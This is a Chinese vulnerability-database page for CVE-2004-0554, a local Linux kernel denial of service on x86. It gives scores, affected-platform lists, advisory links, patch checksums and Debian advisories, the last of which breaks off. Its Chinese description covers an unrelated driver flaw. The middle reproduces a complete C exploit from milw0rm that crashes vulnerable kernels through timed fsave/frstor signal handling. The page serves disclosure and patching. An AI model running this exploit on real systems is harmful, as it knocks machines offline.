CVE-2004-0554
CVSS2.1
发布时间 :2004-08-06 00:00:00
修订时间 :2016-10-17 22:46:06
NMCOEP    

[原文]Linux kernel 2.4.x and 2.6.x for x86 allows local users to cause a denial of service (system crash), possibly via an infinite loop that triggers a signal handler with a certain sequence of fsave and frstor instructions, as originally demonstrated using a "crash.c" program.


[CNNVD]Linux Kernel多个设备驱动漏洞(CNNVD-200408-053)

        
        Linux是一款开放源代码操作系统。
        Linux内核多个设备驱动存在问题,本地攻击者可以利用这些漏洞进行权限提升或对系统进行拒绝服务攻击。
        这些受影响的设备驱动为:aironet、asus_acpi、decnet、mpu401、msnd和pss,这些问题允许攻击者访问内核内存获得敏感信息或权限提升。
        

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:redhat:enterprise_linux:2.1::advanced_server
cpe:/o:redhat:enterprise_linux:3.0::enterprise_server
cpe:/o:suse:suse_linux:8.0::i386
cpe:/o:redhat:enterprise_linux:3.0::advanced_servers
cpe:/a:suse:suse_linux_office_serverSuSE SuSE Linux Office Server
cpe:/h:avaya:s8300:r2.0.0
cpe:/o:linux:linux_kernel:2.6.3Linux Kernel 2.6.3
cpe:/o:linux:linux_kernel:2.6.2Linux Kernel 2.6.2
cpe:/a:suse:suse_linux_admin-cd_for_firewallSuSE SuSE Linux Admin-CD for Firewall
cpe:/o:avaya:modular_messaging_message_storage_server:s3400
cpe:/o:linux:linux_kernel:2.6.1Linux Kernel 2.6.1
cpe:/o:redhat:enterprise_linux:3.0::workstation
cpe:/o:linux:linux_kernel:2.6.0Linux Kernel 2.6.0
cpe:/a:suse:suse_linux_firewall_cdSuSE SuSE Linux Firewall CD
cpe:/a:suse:suse_email_server:3.1
cpe:/o:conectiva:linux:9.0Conectiva Linux 9.0
cpe:/o:gentoo:linux:1.4Gentoo Linux 1.4
cpe:/o:suse:suse_linux:9.0SuSE SuSE Linux 9.0
cpe:/o:suse:suse_linux:8::enterprise_server
cpe:/o:suse:suse_linux:9.1SuSE SuSE Linux 9.1
cpe:/o:suse:suse_linux:7::enterprise_server
cpe:/o:redhat:enterprise_linux:2.1::enterprise_server
cpe:/o:linux:linux_kernel:2.6.1:rc2Linux Kernel 2.6.1 Release Candidate 2
cpe:/o:linux:linux_kernel:2.6.1:rc1Linux Kernel 2.6.1 Release Candidate 1
cpe:/o:suse:suse_linux:9.0::x86_64
cpe:/a:suse:suse_linux_connectivity_serverSuSE SuSE Linux Connectivity Server
cpe:/o:linux:linux_kernel:2.4.19Linux Kernel 2.4.19
cpe:/o:redhat:enterprise_linux:2.1::workstation
cpe:/o:linux:linux_kernel:2.4.18Linux Kernel 2.4.18
cpe:/a:suse:suse_email_server:iii
cpe:/o:linux:linux_kernel:2.6.6:rc1Linux Kernel 2.6.6 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.23Linux Kernel 2.4.23
cpe:/a:suse:suse_office_serverSuSE SuSE Office Server
cpe:/o:linux:linux_kernel:2.4.22Linux Kernel 2.4.22
cpe:/o:linux:linux_kernel:2.6.7:rc1Linux Kernel 2.6.7 Release Candidate 1
cpe:/o:conectiva:linux:8.0Conectiva Conectiva Linux 8.0
cpe:/a:avaya:intuity_audix:::lx
cpe:/h:avaya:s8300:r2.0.1
cpe:/o:linux:linux_kernel:2.4.25Linux Kernel 2.4.25
cpe:/o:suse:suse_linux:8.1SuSE SuSE Linux 8.1
cpe:/o:linux:linux_kernel:2.4.24Linux Kernel 2.4.24
cpe:/o:linux:linux_kernel:2.4.26Linux Kernel 2.4.26
cpe:/o:suse:suse_linux:8.0SuSE SuSE Linux 8.0
cpe:/a:suse:suse_linux_database_serverSuSE SuSE Linux Database Server
cpe:/o:linux:linux_kernel:2.4.21Linux Kernel 2.4.21
cpe:/o:linux:linux_kernel:2.6.7Linux Kernel 2.6.7
cpe:/h:avaya:converged_communications_server:2.0Avaya Converged Communications Server 2.0
cpe:/o:linux:linux_kernel:2.6.6Linux Kernel 2.6.6
cpe:/h:avaya:s8500:r2.0.1
cpe:/h:avaya:s8500:r2.0.0
cpe:/h:avaya:s8700:r2.0.1
cpe:/h:avaya:s8700:r2.0.0
cpe:/o:linux:linux_kernel:2.6.5Linux Kernel 2.6.5
cpe:/o:linux:linux_kernel:2.6.4Linux Kernel 2.6.4
cpe:/o:suse:suse_linux:8.2SuSE SuSE Linux 8.2

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9426Multiple unknown vulnerabilities in Linux kernel 2.4 and 2.6 allow local users to gain privileges or access kernel memory, as found by the S...
oval:org.mitre.oval:def:2915Linux Kernel Denial of Service Vulnerability via fsave and frstor Instructions
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0554
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0554
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-053
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000845
(UNKNOWN)  CONECTIVA  CLA-2004:845
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=15905
(UNKNOWN)  MISC  http://gcc.gnu.org/bugzilla/show_bug.cgi?id=15905
http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
(UNKNOWN)  MISC  http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
http://lwn.net/Articles/91155/
(UNKNOWN)  FEDORA  FEDORA-2004-186
http://marc.info/?l=bugtraq&m=108786114032681&w=2
(UNKNOWN)  BUGTRAQ  20040620 TSSA-2004-011 - kernel
http://marc.info/?l=bugtraq&m=108793699910896&w=2
(UNKNOWN)  ENGARDE  ESA-20040621-005
http://marc.info/?l=linux-kernel&m=108681568931323&w=2
(UNKNOWN)  MLIST  [linux-kernel] 20040609 timer + fpu stuff locks my console race
http://security.gentoo.org/glsa/glsa-200407-02.xml
(UNKNOWN)  GENTOO  GLSA-200407-02
http://www.debian.org/security/2006/dsa-1067
(UNKNOWN)  DEBIAN  DSA-1067
http://www.debian.org/security/2006/dsa-1069
(UNKNOWN)  DEBIAN  DSA-1069
http://www.debian.org/security/2006/dsa-1070
(UNKNOWN)  DEBIAN  DSA-1070
http://www.debian.org/security/2006/dsa-1082
(UNKNOWN)  DEBIAN  DSA-1082
http://www.kb.cert.org/vuls/id/973654
(VENDOR_ADVISORY)  CERT-VN  VU#973654
http://www.mandriva.com/security/advisories?name=MDKSA-2004:062
(UNKNOWN)  MANDRAKE  MDKSA-2004:062
http://www.novell.com/linux/security/advisories/2004_17_kernel.html
(UNKNOWN)  SUSE  SuSE-SA:2004:017
http://www.redhat.com/support/errata/RHSA-2004-255.html
(UNKNOWN)  REDHAT  RHSA-2004:255
http://www.redhat.com/support/errata/RHSA-2004-260.html
(UNKNOWN)  REDHAT  RHSA-2004:260
http://www.securityfocus.com/bid/10538
(UNKNOWN)  BID  10538
http://www.trustix.net/errata/2004/0034/
(UNKNOWN)  TRUSTIX  2004-0034
http://xforce.iss.net/xforce/xfdb/16412
(VENDOR_ADVISORY)  XF  linux-dos(16412)

- 漏洞信息

Linux Kernel多个设备驱动漏洞
低危 未知
2004-08-06 00:00:00 2005-10-20 00:00:00
本地  
        
        Linux是一款开放源代码操作系统。
        Linux内核多个设备驱动存在问题,本地攻击者可以利用这些漏洞进行权限提升或对系统进行拒绝服务攻击。
        这些受影响的设备驱动为:aironet、asus_acpi、decnet、mpu401、msnd和pss,这些问题允许攻击者访问内核内存获得敏感信息或权限提升。
        

- 公告与补丁

        厂商补丁:
        RedHat
        ------
        RedHat已经为此发布了一个安全公告(RHSA-2004:255-10)以及相应补丁:
        RHSA-2004:255-10:Updated kernel packages fix security vulnerabilities
        链接:https://www.redhat.com/support/errata/RHSA-2004-255.html
        补丁下载:
        Red Hat Desktop (v. 3)
        --------------------------------------------------------------------------------
        
        AMD64:
        kernel-2.4.21-15.0.2.EL.x86_64.rpm 13aabc1c96dfee65f73246051a955ba8
        kernel-doc-2.4.21-15.0.2.EL.x86_64.rpm 608d072210521af17c455f7754a6e352
        kernel-smp-2.4.21-15.0.2.EL.x86_64.rpm 82154d7551d6e4947af70b3044c9d4d2
        kernel-smp-unsupported-2.4.21-15.0.2.EL.x86_64.rpm 8fde60be45154b7722893feb65506f42
        kernel-source-2.4.21-15.0.2.EL.x86_64.rpm 44be30f820be806621b47786ebff1844
        kernel-unsupported-2.4.21-15.0.2.EL.x86_64.rpm aa060423c3136a26ca31a7aafa337380
        
        EM64T:
        kernel-2.4.21-15.0.2.EL.ia32e.rpm 90dabcf0bb591756e5f04f397cf8a156
        kernel-unsupported-2.4.21-15.0.2.EL.ia32e.rpm 144943d76b23470572326c84b57c0dd9
        
        SRPMS:
        kernel-2.4.21-15.0.2.EL.src.rpm 669d77609b1c47ff49c939c1ea7bbc45
        
        athlon:
        kernel-2.4.21-15.0.2.EL.athlon.rpm 05b0bcb454ac5454479481d0288fbf20
        kernel-smp-2.4.21-15.0.2.EL.athlon.rpm 96eb477ac938da01b729b5ac5ed36e3b
        kernel-smp-unsupported-2.4.21-15.0.2.EL.athlon.rpm 9d24273cc70bb6be810984cb3f3d0a36
        kernel-unsupported-2.4.21-15.0.2.EL.athlon.rpm 17f10f04cffc9751afb1499aaff00fdc
        
        i386:
        kernel-BOOT-2.4.21-15.0.2.EL.i386.rpm 4635f8c6555f3b3e52feb9444b2e230d
        kernel-doc-2.4.21-15.0.2.EL.i386.rpm 6cf6c39a83dfe7cca9c9a79f02dc3fa8
        kernel-source-2.4.21-15.0.2.EL.i386.rpm 3c690c54909996d3bba3da7c8d8f894a
        
        i686:
        kernel-2.4.21-15.0.2.EL.i686.rpm a3073219b60cbb7ce447a22e5103e097
        kernel-hugemem-2.4.21-15.0.2.EL.i686.rpm 6c8dad84abc4dd1892c9dc862c329273
        kernel-hugemem-unsupported-2.4.21-15.0.2.EL.i686.rpm 426c517d35a53546138b0d72a0515909
        kernel-smp-2.4.21-15.0.2.EL.i686.rpm bece09ba4a651196758380372dc4c593
        kernel-smp-unsupported-2.4.21-15.0.2.EL.i686.rpm 775338e099c3bdf36a586d29e55dbd3e
        kernel-unsupported-2.4.21-15.0.2.EL.i686.rpm 89ee51cb60f7a1f34e66cbb16abcba07
        
        Red Hat Enterprise Linux AS (v. 3)
        --------------------------------------------------------------------------------
        
        AMD64:
        kernel-2.4.21-15.0.2.EL.x86_64.rpm 13aabc1c96dfee65f73246051a955ba8
        kernel-doc-2.4.21-15.0.2.EL.x86_64.rpm 608d072210521af17c455f7754a6e352
        kernel-smp-2.4.21-15.0.2.EL.x86_64.rpm 82154d7551d6e4947af70b3044c9d4d2
        kernel-smp-unsupported-2.4.21-15.0.2.EL.x86_64.rpm 8fde60be45154b7722893feb65506f42
        kernel-source-2.4.21-15.0.2.EL.x86_64.rpm 44be30f820be806621b47786ebff1844
        kernel-unsupported-2.4.21-15.0.2.EL.x86_64.rpm aa060423c3136a26ca31a7aafa337380
        
        EM64T:
        kernel-2.4.21-15.0.2.EL.ia32e.rpm 90dabcf0bb591756e5f04f397cf8a156
        kernel-unsupported-2.4.21-15.0.2.EL.ia32e.rpm 144943d76b23470572326c84b57c0dd9
        
        SRPMS:
        kernel-2.4.21-15.0.2.EL.src.rpm 669d77609b1c47ff49c939c1ea7bbc45
        
        athlon:
        kernel-2.4.21-15.0.2.EL.athlon.rpm 05b0bcb454ac5454479481d0288fbf20
        kernel-smp-2.4.21-15.0.2.EL.athlon.rpm 96eb477ac938da01b729b5ac5ed36e3b
        kernel-smp-unsupported-2.4.21-15.0.2.EL.athlon.rpm 9d24273cc70bb6be810984cb3f3d0a36
        kernel-unsupported-2.4.21-15.0.2.EL.athlon.rpm 17f10f04cffc9751afb1499aaff00fdc
        
        i386:
        kernel-BOOT-2.4.21-15.0.2.EL.i386.rpm 4635f8c6555f3b3e52feb9444b2e230d
        kernel-doc-2.4.21-15.0.2.EL.i386.rpm 6cf6c39a83dfe7cca9c9a79f02dc3fa8
        kernel-source-2.4.21-15.0.2.EL.i386.rpm 3c690c54909996d3bba3da7c8d8f894a
        
        i686:
        kernel-2.4.21-15.0.2.EL.i686.rpm a3073219b60cbb7ce447a22e5103e097
        kernel-hugemem-2.4.21-15.0.2.EL.i686.rpm 6c8dad84abc4dd1892c9dc862c329273
        kernel-hugemem-unsupported-2.4.21-15.0.2.EL.i686.rpm 426c517d35a53546138b0d72a0515909
        kernel-smp-2.4.21-15.0.2.EL.i686.rpm bece09ba4a651196758380372dc4c593
        kernel-smp-unsupported-2.4.21-15.0.2.EL.i686.rpm 775338e099c3bdf36a586d29e55dbd3e
        kernel-unsupported-2.4.21-15.0.2.EL.i686.rpm 89ee51cb60f7a1f34e66cbb16abcba07
        
        ia64:
        kernel-2.4.21-15.0.2.EL.ia64.rpm 24ddfb9f957028d3bbc5cfff2b25bc67
        kernel-doc-2.4.21-15.0.2.EL.ia64.rpm cc60f06bdd3ad6a05040df8ba40d41a1
        kernel-source-2.4.21-15.0.2.EL.ia64.rpm a8fc2a1042ee3e580881b50c97a3241d
        kernel-unsupported-2.4.21-15.0.2.EL.ia64.rpm 60e5c1f1efa438a658b12e16543214cd
        
        ppc64:
        kernel-doc-2.4.21-15.0.2.EL.ppc64.rpm 3f21dd578af78ed576c7cbf6e17a3f16
        kernel-source-2.4.21-15.0.2.EL.ppc64.rpm 937a05a7666f14f95d20be19fc461f05
        
        ppc64iseries:
        kernel-2.4.21-15.0.2.EL.ppc64iseries.rpm 495a1c8f85e0e237643fd2e3f89ddaed
        kernel-unsupported-2.4.21-15.0.2.EL.ppc64iseries.rpm 57f0111e6443fd5a39099731cc0856e8
        
        ppc64pseries:
        kernel-2.4.21-15.0.2.EL.ppc64pseries.rpm 6ad188ae0c61a077dede364c59448f61
        kernel-unsupported-2.4.21-15.0.2.EL.ppc64pseries.rpm 22f38c0c1abee45e0ac24caa19e06311
        
        s390:
        kernel-2.4.21-15.0.2.EL.s390.rpm 1b9d329e2b074616239a91fd967871c8
        kernel-doc-2.4.21-15.0.2.EL.s390.rpm 5e27cc65020dbb1c92368e79c3edcbe6
        kernel-source-2.4.21-15.0.2.EL.s390.rpm 282bb4f0e5bfbec228a742ab6666665d
        kernel-unsupported-2.4.21-15.0.2.EL.s390.rpm 8f67e244ba867a103e6b211d3d0d1fba
        
        s390x:
        kernel-2.4.21-15.0.2.EL.s390x.rpm a8bab06e561ac8b6ab473b4e722a570b
        kernel-doc-2.4.21-15.0.2.EL.s390x.rpm 860944b6a4e8384a0b344dc96ea48b6d
        kernel-source-2.4.21-15.0.2.EL.s390x.rpm 6e9628389fa69aafc9c910e4b37a425a
        kernel-unsupported-2.4.21-15.0.2.EL.s390x.rpm 3522c33c18eb876b5033ef12398707fe
        
        Red Hat Enterprise Linux ES (v. 3)
        --------------------------------------------------------------------------------
        
        AMD64:
        kernel-2.4.21-15.0.2.EL.x86_64.rpm 13aabc1c96dfee65f73246051a955ba8
        kernel-doc-2.4.21-15.0.2.EL.x86_64.rpm 608d072210521af17c455f7754a6e352
        kernel-smp-2.4.21-15.0.2.EL.x86_64.rpm 82154d7551d6e4947af70b3044c9d4d2
        kernel-smp-unsupported-2.4.21-15.0.2.EL.x86_64.rpm 8fde60be45154b7722893feb65506f42
        kernel-source-2.4.21-15.0.2.EL.x86_64.rpm 44be30f820be806621b47786ebff1844
        kernel-unsupported-2.4.21-15.0.2.EL.x86_64.rpm aa060423c3136a26ca31a7aafa337380
        
        EM64T:
        kernel-2.4.21-15.0.2.EL.ia32e.rpm 90dabcf0bb591756e5f04f397cf8a156
        kernel-unsupported-2.4.21-15.0.2.EL.ia32e.rpm 144943d76b23470572326c84b57c0dd9
        
        SRPMS:
        kernel-2.4.21-15.0.2.EL.src.rpm

- 漏洞信息 (306)

Linux Kernel 2.4.x-2.6.x Assembler Inline Function Local DoS Exploit (EDBID:306)
linux dos
2004-06-25 Verified
0 lorenzo
N/A [点击下载]
/* -----------------------------------------------------------------------------
 * frstor Local Kernel exploit
 * Crashes any kernel from 2.4.18
 * to 2.6.7 because frstor in assembler inline offsets in memory by 4.
 * Original proof of concept code
 * by stian_@_nixia.no.
 * Added some stuff by lorenzo_@_gnu.org
 * and fixed the fsave line with (*fpubuf).
 * -----------------------------------------------------------------------------
 */

/*
-----------------------------------------
Some debugging information made
available by stian_@_nixia.no
-----------------------------------------
TakeDown:
        pushl   %ebp
        movl    %esp, %ebp
        subl    $136, %esp
        leal    -120(%ebp), %eax
        movl    %eax, -124(%ebp)
#APP
        fsave -124(%ebp)

#NO_APP
        subl    $4, %esp
        pushl   $1
        pushl   $.LC0
        pushl   $2
        call    write
        addl    $16, %esp
        leal    -120(%ebp), %eax
        movl    %eax, -128(%ebp)
#APP
        frstor -128(%ebp)

#NO_APP
        leave
        ret
*/

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void TakeDown(int ignore)
{
 char fpubuf[108];
// __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
__asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf)); 
 write(2, "*", 1);
 __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
 struct itimerval spec;
 signal(SIGALRM, TakeDown);
 spec.it_interval.tv_sec=0;
 spec.it_interval.tv_usec=100;
 spec.it_value.tv_sec=0;
 spec.it_value.tv_usec=100;
 setitimer(ITIMER_REAL, &spec, NULL);
 while(1)
  write(1, ".", 1);

 return 0;
}
// <<EOF


// milw0rm.com [2004-06-25]
		

- 漏洞信息 (F46509)

Debian Linux Security Advisory 1070-1 (PacketStormID:F46509)
2006-05-22 00:00:00
Debian,Dann Frazier  debian.org
advisory,remote,denial of service,arbitrary,kernel,local,vulnerability
linux,debian
CVE-2004-0427,CVE-2005-0489,CVE-2004-0394,CVE-2004-0447,CVE-2004-0554,CVE-2004-0565,CVE-2004-0685,CVE-2005-0001,CVE-2004-0883,CVE-2004-0949,CVE-2004-1016,CVE-2004-1333,CVE-2004-0997,CVE-2004-1335,CVE-2004-1017,CVE-2005-0124,CVE-2005-0528,CVE-2003-0984
[点击下载]

Debian Security Advisory 1070-1 - Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1070-1                    security@debian.org
http://www.debian.org/security/               Martin Schulze, Dann Frazier
May 21th, 2006                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : kernel-source-2.4.19,kernel-image-sparc-2.4,kernel-patch-2.4.19-mips
Vulnerability  : several
Problem-Type   : local/remote
Debian-specific: no
CVE IDs        : CVE-2004-0427 CVE-2005-0489 CVE-2004-0394 CVE-2004-0447 CVE-2004-0554 CVE-2004-0565 CVE-2004-0685  CVE-2005-0001 CVE-2004-0883 CVE-2004-0949 CVE-2004-1016 CVE-2004-1333 CVE-2004-0997 CVE-2004-1335 CVE-2004-1017 CVE-2005-0124 CVE-2005-0528 CVE-2003-0984 CVE-2004-1070 CVE-2004-1071 CVE-2004-1072 CVE-2004-1073 CVE-2004-1074 CVE-2004-0138 CVE-2004-1068 CVE-2004-1234 CVE-2005-0003 CVE-2004-1235 CVE-2005-0504 CVE-2005-0384 CVE-2005-0135

Several local and remote vulnerabilities have been discovered in the Linux
kernel that may lead to a denial of service or the execution of arbitrary
code. The Common Vulnerabilities and Exposures project identifies the
following problems:


 CVE-2004-0427

     A local denial of service vulnerability in do_fork() has been found.     

 CVE-2005-0489

     A local denial of service vulnerability in proc memory handling has
     been found.

 CVE-2004-0394

     A buffer overflow in the panic handling code has been found.

 CVE-2004-0447

     A local denial of service vulnerability through a null pointer
     dereference in the IA64 process handling code has been found.

 CVE-2004-0554

     A local denial of service vulnerability through an infinite loop in
     the signal handler code has been found.

 CVE-2004-0565

     An information leak in the context switch code has been found on
     the IA64 architecture.

 CVE-2004-0685

     Unsafe use of copy_to_user in USB drivers may disclose sensitive
     information.

 CVE-2005-0001

     A race condition in the i386 page fault handler may allow privilege
     escalation.

 CVE-2004-0883

     Multiple vulnerabilities in the SMB filesystem code may allow denial
     of service of information disclosure.

 CVE-2004-0949

     An information leak discovered in the SMB filesystem code.

 CVE-2004-1016

     A local denial of service vulnerability has been found in the SCM layer.

 CVE-2004-1333

     An integer overflow in the terminal code may allow a local denial of
     service vulnerability.

 CVE-2004-0997

     A local privilege escalation in the MIPS assembly code has been found.
 
 CVE-2004-1335
 
     A memory leak in the ip_options_get() function may lead to denial of
     service.
      
 CVE-2004-1017

     Multiple overflows exist in the io_edgeport driver which might be usable
     as a denial of service attack vector.
 
 CVE-2005-0124

     Bryan Fulton reported a bounds checking bug in the coda_pioctl function
     which may allow local users to execute arbitrary code or trigger a denial
     of service attack.

 CVE-2005-0528

     A local privilege escalation in the mremap function has been found

 CVE-2003-0984

     Inproper initialization of the RTC may disclose information.

 CVE-2004-1070

     Insufficient input sanitising in the load_elf_binary() function may
     lead to privilege escalation.

 CVE-2004-1071

     Incorrect error handling in the binfmt_elf loader may lead to privilege
     escalation.

 CVE-2004-1072

     A buffer overflow in the binfmt_elf loader may lead to privilege
     escalation or denial of service.

 CVE-2004-1073

     The open_exec function may disclose information.

 CVE-2004-1074

     The binfmt code is vulnerable to denial of service through malformed
     a.out binaries.

 CVE-2004-0138

     A denial of service vulnerability in the ELF loader has been found.

 CVE-2004-1068

     A programming error in the unix_dgram_recvmsg() function may lead to
     privilege escalation.

 CVE-2004-1234

     The ELF loader is vulnerable to denial of service through malformed
     binaries.

 CVE-2005-0003

     Crafted ELF binaries may lead to privilege escalation, due to 
     insufficient checking of overlapping memory regions.

 CVE-2004-1235

     A race condition in the load_elf_library() and binfmt_aout() functions
     may allow privilege escalation.

 CVE-2005-0504

     An integer overflow in the Moxa driver may lead to privilege escalation.

 CVE-2005-0384

     A remote denial of service vulnerability has been found in the PPP
     driver.

 CVE-2005-0135

     An IA64 specific local denial of service vulnerability has been found
     in the unw_unwind_to_user() function.

The following matrix explains which kernel version for which architecture
fix the problems mentioned above:

                                     Debian 3.0 (woody)
     Source                          2.4.19-4
     Sun Sparc architecture          26woody1
     Little endian MIPS architecture 0.020911.1.woody5


We recommend that you upgrade your kernel package immediately and reboot
the machine.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get dist-upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.dsc
      Size/MD5 checksum:      692 27f44a0eec5837b0b01d26c6cff392be
    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.tar.gz
      Size/MD5 checksum:    27768 6c719a6343c9ea0dad44a736b3842504
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.dsc
      Size/MD5 checksum:      792 d7c89c90fad77944ca1c5a18327f31dd
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.tar.gz
      Size/MD5 checksum:  1013866 21b4b677a7a319442c8fe8a4c72eb4c2
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.dsc
      Size/MD5 checksum:      672 4c353db091e8edc4395e46cf8d39ec42
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.diff.gz
      Size/MD5 checksum:    71071 7012adde9ba9a573e1be66f0d258721a
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz
      Size/MD5 checksum: 32000211 237896fbb45ae652cc9c5cecc9b746da

  Architecture independent components:

    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.18-sparc_22woody1_all.deb
      Size/MD5 checksum:  1521850 75d23c7c54094b1d25d3b708fd644407
    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.19-sparc_26woody1_all.deb
      Size/MD5 checksum:  1547874 c6881b25e3a5967e0f6f9c351fb88962
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5_all.deb
      Size/MD5 checksum:  1014564 0e89364c2816f5f4519256a8ea367ab6
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody3_all.deb
      Size/MD5 checksum:  1785490 c66cef9e87d9a89caeee02af31e3c96d
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3_all.deb
      Size/MD5 checksum: 25902158 321403201a198371fd55c9b8ac4583f7

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u_22woody1_sparc.deb
      Size/MD5 checksum:  3923058 db7bbd997410667bec4ac713d81d60ea
    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u-smp_22woody1_sparc.deb
      Size/MD5 checksum:  4044796 106fcb86485531d96b4fdada61b71405
    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u_26woody1_sparc.deb
      Size/MD5 checksum:  3831424 347b0c290989f0cc99f3b336c156f61d
    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u-smp_26woody1_sparc.deb
      Size/MD5 checksum:  3952220 f7dd8326c0ae0b0dee7c46e24023d0a2

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody5_mips.deb
      Size/MD5 checksum:  3890804 7348a8cd3961190aa2a19f562c96fe2f
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody5_mips.deb
      Size/MD5 checksum:  2080618 d52d00e7097ae0c8f4ccb6f34656361d
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody5_mips.deb
      Size/MD5 checksum:  2080830 db7141d3c0d86a43659176f974599cc2
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody5_mips.deb
      Size/MD5 checksum:    15816 c31e3b72d6eac6f3f99f75ea838e0bf9

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEcAc/Xm3vHE4uyloRAtGHAJoC9+1ELp5vTYgL4SDsNOIndI5rqQCePabu
rmancVBp6F2Nfh1PHQQrOTk=
=7GeM
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息 (F46508)

Debian Linux Security Advisory 1069-1 (PacketStormID:F46508)
2006-05-22 00:00:00
Debian,Dann Frazier  debian.org
advisory,remote,denial of service,arbitrary,kernel,local,vulnerability
linux,debian
CVE-2004-0427,CVE-2005-0489,CVE-2004-0394,CVE-2004-0447,CVE-2004-0554,CVE-2004-0565,CVE-2004-0685,CVE-2005-0001,CVE-2004-0883,CVE-2004-0949,CVE-2004-1016,CVE-2004-1333,CVE-2004-0997,CVE-2004-1335,CVE-2004-1017,CVE-2005-0124,CVE-2005-0528,CVE-2003-0984
[点击下载]

Debian Security Advisory 1069-1 - Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1069-1                    security@debian.org
http://www.debian.org/security/               Martin Schulze, Dann Frazier
May 20th, 2006                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : kernel-source-2.4.18,kernel-image-2.4.18-1-alpha,kernel-image-2.4.18-1-i386,kernel-image-2.4.18-hppa,kernel-image-2.4.18-powerpc-xfs,kernel-patch-2.4.18-powerpc,kernel-patch-benh
Vulnerability  : several
Problem-Type   : local/remote
Debian-specific: no
